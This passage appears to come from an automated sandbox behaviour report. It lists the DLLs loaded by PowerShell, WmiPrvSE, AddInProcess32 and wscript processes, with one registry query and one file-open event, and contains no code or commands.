                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wldp.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: comsvcs.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: winmm.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: urlmon.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wininet.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: iertutil.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: srvcli.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: netutils.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: iphlpapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rstrtmgr.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ncrypt.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ntasn1.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: sspicli.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: mswsock.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: dnsapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rasadhlp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: fwpuclnt.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wldp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: profapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: winhttp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: winnsi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: winmm.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: urlmon.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wininet.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: iertutil.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: srvcli.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: netutils.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: iphlpapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rstrtmgr.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ncrypt.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ntasn1.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: version.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wininet.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wldp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: pstorec.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: vaultcli.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wintypes.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: dpapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: msasn1.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wldp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: pstorec.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: sspicli.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: msasn1.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: msasn1.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wldp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: msasn1.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: sspicli.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: winmm.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: urlmon.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wininet.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: iertutil.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: srvcli.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: netutils.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: iphlpapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rstrtmgr.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ncrypt.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ntasn1.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
                    Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
